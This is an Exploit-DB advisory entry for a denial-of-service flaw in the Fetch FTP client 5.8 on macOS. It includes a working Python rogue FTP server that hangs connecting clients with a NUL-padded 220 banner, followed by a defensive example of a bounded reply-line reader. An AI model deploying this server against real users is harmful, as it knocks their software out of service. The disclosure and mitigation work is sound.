Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)

EDB-ID: 50696
CVE: N/A
Author: LiquidWorm
Type: local
Platform: macOS
Date: 2022-02-02

# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm

#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER     PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND
# lqwrm   3498 100.0  0.5 60081236  54488   ??  R     5:44PM   4:28.97 Fetch-5K1354-266470421
# ~/Desktop> 
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
#            macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#

import socket

host = '0.0.0.0'
port = 21

s = socket.socket()
s.bind((host, port))
s.listen(2)

print('Ascolto su', host, 'porta', port, '...')

consumptor  = '220\x20'
consumptor += 'ftp.zeroscience.mk'
consumptor += '\x00' * 0x101E
consumptor += '\x0D\x0A'

while True:
    try:
        c, a = s.accept()
        print('Connessione da', a)
        print('CPU 100%, Memory++')
        c.send(bytes(consumptor, 'UTF-8'))
        c.send(b'Thricer OK, p\'taah\x0A\x0D')
        print(c.recv(17))
    except:
        break
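
The description above ties the hang to a long server response of more than 2K bytes. One client-side mitigation is a control-channel reader that bounds what it will accept before parsing. The following is an added example, not part of the original advisory or of Fetch's code; the names read_reply_line, FtpReplyError and classify, the 2048-byte cap and the sample replies are assumptions made for illustration.

```python
import io

MAX_REPLY_LINE = 2048  # assumed cap, chosen from the "more than 2K bytes" in the description


class FtpReplyError(Exception):
    """Raised when a control-channel reply line is refused."""


def read_reply_line(reader, limit=MAX_REPLY_LINE):
    """Read one reply line from a binary file object, e.g. sock.makefile('rb')
    on a socket with a timeout set. Returns (code, text) or raises FtpReplyError."""
    # readline(n) stops after n bytes, so the server cannot make us buffer more.
    line = reader.readline(limit + 1)
    if not line:
        raise FtpReplyError("connection closed before a reply arrived")
    if len(line) > limit:
        raise FtpReplyError("reply line longer than %d bytes" % limit)
    if not line.endswith(b"\r\n"):
        raise FtpReplyError("reply line not terminated by CRLF")
    body = line[:-2]
    # Reply text is printable; NUL padding and other control bytes are refused.
    if any(b < 0x20 and b != 0x09 for b in body):
        raise FtpReplyError("control byte in reply line")
    if len(body) < 3 or not body[:3].isdigit() or body[3:4] not in (b"", b" ", b"-"):
        raise FtpReplyError("malformed reply code")
    return int(body[:3]), body[4:].decode("ascii", errors="replace")


def classify(raw):
    """Return 'ok' or the refusal reason for one constructed byte string."""
    try:
        read_reply_line(io.BytesIO(raw))
        return "ok"
    except FtpReplyError as exc:
        return str(exc)


# Constructed sample replies (not captured traffic).
SAMPLES = {
    "normal banner": b"220 ftp.example.test ready\r\n",
    "padded banner": b"220 ftp.example.test" + b"\x00" * 0x101E + b"\r\n",
    "short NUL pad": b"220 ftp.example.test\x00\x00\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, "->", classify(raw))
```

A caller that gets FtpReplyError should close the control connection instead of reading further, since the rest of the stream is no longer aligned on a reply boundary.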